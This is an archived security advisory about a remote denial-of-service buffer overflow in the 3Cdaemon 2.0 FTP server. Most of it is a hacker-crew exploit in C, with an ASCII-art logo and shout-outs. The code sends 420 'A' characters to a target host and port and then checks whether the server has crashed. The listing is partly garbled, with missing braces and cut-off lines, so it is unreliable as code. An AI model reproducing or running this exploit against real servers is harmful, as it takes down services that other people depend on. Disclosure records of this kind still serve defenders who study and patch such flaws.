26th Sep 2002 [SBWID-5322]
	3Cdaemon remote DoS
	3Cdaemon 2.0 revision 10
	MaD SKiLL 'H' [http://www.madskill.tk] says :
	When 400+ chars are sent to the FTP server, it crashes imediatly.
	 Sample :
	/* MaD SKiLL 'H'
	* MsH 4 life! http://www.madskill.tk
	* *Private Release*
	* 3CDaemon 2.0 revision 10 DoS
	* 11:12 14-4-2002: BOF flaw found by skyrim
	*  1:00 15-4-2002: exploit done.
	* 23:31 16-4-2002: Edited the exploit slightly, it's a better code now
	* This program will exploit the buffer overflow vulnerability of
	* 3CDaemon 2.0 FTP servers. Sending 400+ chars will make the server crash
	* at any time they're send.
	* Tested on:
	* [OS]                                    [version]
	*  Windows XP (5.1 - 2600)                 3CDaemon 2.0 revision 10
	*  ###
	* #####      ####                            ##
	* ######    ######                         ######
	* ######   ########   ########            ########      ######
	* ######  ####### ### ###########          ########     #######
	* ###### ######## #### ############        ########     #######
	* ############### ##### ############        #######     #######
	* ############## ######  ############       #######     #######
	* ############## #######  ###########        ######    #######
	* ############# ########  ### ########       ######  #########
	*  ############ ### ####  ### #######        #################
	*   ##### ###############  ##########        #################
	*    ###  ######### #####  #########         ################
	*    #### ######### ##### #########          ################
	*     ### ######### #############            ################
	*      ## #########  ######                  ######   #######
	*          ### ####                          ######   #######
	*                                            ######  ########
	*                                            ######  ########
	*    ####   ## ###### ###  ###        ###    ######  ########
	*   ####### ########  ###  ####      #####    #####   #######
	*   ###############   ###  ####      #####     #####  #######
	*   ####### ########       ####      #####       ##     ###
	*   ######  ######### #### ####      #####
	*    #####   ######## #### ####       ####
	*     ###### ######## #### ####   ### ####   ##
	*      ########## ### #### #### ########## ######
	*       ######### ### ###########################
	*      ##########  ######## #####################
	*    #############  ######  ########## ##########
	*   ########  #####   ####  ###   ###  ###   ###
	* I don't know if this will work on versions other then the one I tested it 
	* Have fun.
	* Crew shouts go to: MsH, DFA, uDc
	* Personal shouts to: mannie, primus, amok, torment, talented, warsteam, 
	frodo, maxxo,
	* xo|l, fearless, cybje, kell, frodo, maxxo, and everyone else.
	* skyrim ([email protected])
	#include <stdio.h>
	#include <sys/types.h>
	#include <sys/socket.h>
	#include <netinet/in.h>
	#include <netdb.h>
	#define BOFSIZE 420
	char banner(void) { printf("MaD SKiLL 'H' 3CDaemon 2.0 revision 10 
	DoS\n.:[MsH]:.\n   ---\n"); }
	void E(char *msg) { perror(msg); exit(1); }
	main(int argc, char *argv[])
	    static char ownage[BOFSIZE];
	    int sockfd, sockfd2, n;
	    struct sockaddr_in server_addr;
	    struct hostent *server;
	if (argc != 3) {
	    fprintf(stderr,"Usage: %s hostname/ip port\n", argv[0]);
	    memset(ownage, 'A', BOFSIZE);
	    sockfd = socket(AF_INET, SOCK_STREAM, 0);
	    if (sockfd < 0) E("Error occured during opening socket");
	    server = gethostbyname(argv[1]);
	    if (server == NULL) E("Error occured during host lookup -No such 
	    bzero((char *) &server_addr, sizeof(server_addr));
	    server_addr.sin_family = AF_INET;
	    bcopy((char *)server->h_addr,
	         (char *)&server_addr.sin_addr.s_addr,
	    server_addr.sin_port = htons(atoi(argv[2]));
	    printf("Connecting to target FTP server... ");
	    if (connect(sockfd,&server_addr,sizeof(server_addr)) < 0) { E("Error 
	occured during connecting\n"); }
	    printf("Connected, Probing BOF... \n");
	    n = write(sockfd,ownage,strlen(ownage));
	    if (n < 0) { E("Error occured during writing to socket"); }
	    sockfd2=socket(AF_INET, SOCK_STREAM, 0);
	    printf("Done, checking if server is dead.. \n");
	    if (connect(sockfd2,&server_addr,sizeof(server_addr)) < 0) { 
	printf("Couldn't establish connection: It seems like it died! =)\n"); 
	exit(0); }
	    printf("Server is still alive. Perhaps its not vulnerable?\n");
	    return 0;